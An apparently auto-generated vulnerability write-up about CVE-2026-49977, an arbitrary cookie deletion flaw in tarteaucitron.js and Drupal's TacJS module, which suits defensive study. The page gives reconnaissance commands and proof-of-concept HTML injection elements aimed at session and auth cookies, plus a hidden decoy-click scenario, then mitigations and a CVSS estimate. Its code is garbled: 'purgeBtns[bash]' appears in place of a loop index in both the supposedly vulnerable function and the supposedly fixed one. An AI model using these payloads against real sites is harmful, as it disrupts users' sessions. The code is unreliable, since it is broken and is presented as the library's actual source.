Listen to this Post
tarteaucitron.js is a popular open-source cookie consent management library that provides websites with a compliant and accessible cookie banner for GDPR and European cookie law compliance. The library includes a built-in cookie management interface that displays a list of cookies and provides “purge” buttons allowing users to delete individual cookies directly from the banner.
The vulnerability identified as CVE-2026-49977 resides in the `tarteaucitron.cookie.purge()` function, which is invoked on any DOM element that bears the `purgeBtn` CSS class. The core issue is that this function does not perform any validation to verify that:
1. The clicked element is a legitimate tarteaucitron button generated by the library itself
2. The cookie being targeted corresponds to a service actually managed by tarteaucitron
The `data-cookie` HTML attribute is used to specify which cookie should be deleted when a purge button is clicked. Because the library blindly trusts this attribute without sanitization or whitelisting, an attacker who can inject arbitrary HTML into a page can create a malicious element with the `purgeBtn` class and a `data-cookie` attribute pointing to any cookie name.
When a user clicks on this attacker-controlled element, `tarteaucitron.cookie.purge()` executes and silently deletes the specified cookie without any user confirmation or notification. This effectively allows an attacker to delete arbitrary cookies from the user’s browser, provided the cookies do not have the `HttpOnly` flag set.
The attack requires the attacker to have the ability to insert specific data attributes into the page markup—a capability typically available through stored XSS vulnerabilities, malicious CMS plugin configurations, or privileged content editing access. The impact is somewhat limited as cookies with `HttpOnly=true` are protected from JavaScript access and cannot be deleted through this vector, and the attacker must know the exact name of the target cookie.
DailyCVE Form:
Platform: Drupal (TacJS module)
Version: TacJS module (unspecified vulnerable versions)
Vulnerability: Arbitrary cookie deletion
Severity: Moderate
Date: June 3, 2026
Prediction: July 17, 2026
What Undercode Say:
Check if a Drupal site is using the vulnerable TacJS module drush pm-list --type=module --status=enabled | grep tacjs Alternative: Check via Drupal database drush sqlq "SELECT name, status FROM system WHERE type='module' AND name LIKE '%tac%'" Check installed version of tarteaucitron.js library grep -r "tarteaucitron.js" /path/to/drupal/web/modules/contrib/tacjs/ Search for purgeBtn class usage in rendered HTML curl -s https://target-site.com | grep -i "purgeBtn" Test for the vulnerability by injecting a test element (proof of concept) Note: This requires the ability to inject HTML into the page
PoC HTML injection:
<!-- Malicious element that deletes a cookie when clicked --> <a href="" class="purgeBtn" data-cookie="session_token">Click here for discount</a> <!-- Target a common cookie name --> <div class="purgeBtn" data-cookie="user_session">Delete</div> <!-- Target authentication cookies (if HttpOnly=false) --> <button class="purgeBtn" data-cookie="auth_token">Submit</button>
JavaScript analysis:
// The vulnerable function in tarteaucitron.js
tarteaucitron.cookie.purge = function() {
var purgeBtns = document.querySelectorAll('.purgeBtn');
for (var i = 0; i < purgeBtns.length; i++) {
purgeBtns[bash].addEventListener('click', function(e) {
var cookieName = this.getAttribute('data-cookie');
// No validation - directly deletes the cookie
tarteaucitron.cookie.delete(cookieName);
});
}
};
Exploit:
To exploit CVE-2026-49977, an attacker must first gain the ability to inject HTML markup containing specific data attributes into a page where tarteaucitron.js is loaded. This can be achieved through:
1. Stored XSS: Injecting malicious content into a forum post, comment, or any user-generated content field that is not properly sanitized
2. CMS Plugin Access: Gaining high-privilege access to the site’s source code or a CMS plugin configuration
3. Compromised Editor Accounts: Using stolen credentials of content editors who have permission to add raw HTML
Once the attacker can inject HTML, they create an element with:
– The `purgeBtn` class (to trigger the event listener)
– A `data-cookie` attribute set to the name of the target cookie
When a user clicks the malicious element, the `tarteaucitron.cookie.purge()` function executes and silently deletes the specified cookie without any confirmation dialog, visual indication, or logging.
Example attack scenario:
<!-- Hidden malicious element -->
<span class="purgeBtn" data-cookie="user_preferences" style="display:none;"></span>
<!-- Visible decoy that triggers the hidden element -->
<a href="" onclick="document.querySelector('.purgeBtn').click();">Special Offer</a>
This could delete session cookies, preference cookies, or any other non-HttpOnly cookie, potentially causing:
– User session disruption
– Loss of saved preferences
– De-authentication (if the session cookie is not HttpOnly)
– Disruption of tracking or analytics
Protection:
Immediate Actions:
- Update the TacJS module to the patched version as soon as it becomes available from Drupal.org
- Upgrade tarteaucitron.js to version 1.22.0 or higher if using the standalone library
Code-Level Mitigations:
// Implement input validation in the purge function
tarteaucitron.cookie.purge = function() {
var purgeBtns = document.querySelectorAll('.purgeBtn');
var allowedCookies = ['cookie1', 'cookie2', 'cookie3']; // Whitelist
for (var i = 0; i < purgeBtns.length; i++) {
purgeBtns[bash].addEventListener('click', function(e) {
var cookieName = this.getAttribute('data-cookie');
// Validate that the cookie is in the allowed list
if (allowedCookies.indexOf(cookieName) !== -1) {
tarteaucitron.cookie.delete(cookieName);
} else {
console.warn('Attempted to delete unauthorized cookie:', cookieName);
}
});
}
};
Additional Protections:
- Set the `HttpOnly` flag on all sensitive cookies (session tokens, authentication cookies) to prevent JavaScript from accessing or deleting them
- Implement proper input sanitization and output encoding for all user-supplied content
- Use Content Security Policy (CSP) to restrict inline script execution and unauthorized DOM manipulation
- Regularly audit user-generated content and sanitize HTML attributes
- Apply the principle of least privilege to content editors and CMS users
Impact:
Technical Impact:
- Confidentiality: None – cookies are deleted, not exposed
- Integrity: Low – unauthorized deletion of cookies can disrupt user experience
- Availability: Low – may cause session termination or loss of preferences
Business Impact:
- Users may be unexpectedly logged out if session cookies are deleted
- Loss of user preferences leading to degraded user experience
- Disruption of analytics and tracking systems
- Potential for social engineering attacks (users clicking on decoy elements)
- Reputational damage if the vulnerability is exploited in the wild
Limitations:
- Only affects cookies without `HttpOnly=true` flag
- Attacker must know the exact name of the target cookie
- Requires the ability to inject HTML with specific data attributes
- Does not lead to remote code execution or data exfiltration
CVSS Score: Moderate (estimated 4.3-5.4)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (requires content injection capability)
- User Interaction: Required (user must click the malicious element)
- Scope: Unchanged
- Confidentiality Impact: None
- Integrity Impact: Low
- Availability Impact: Low
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

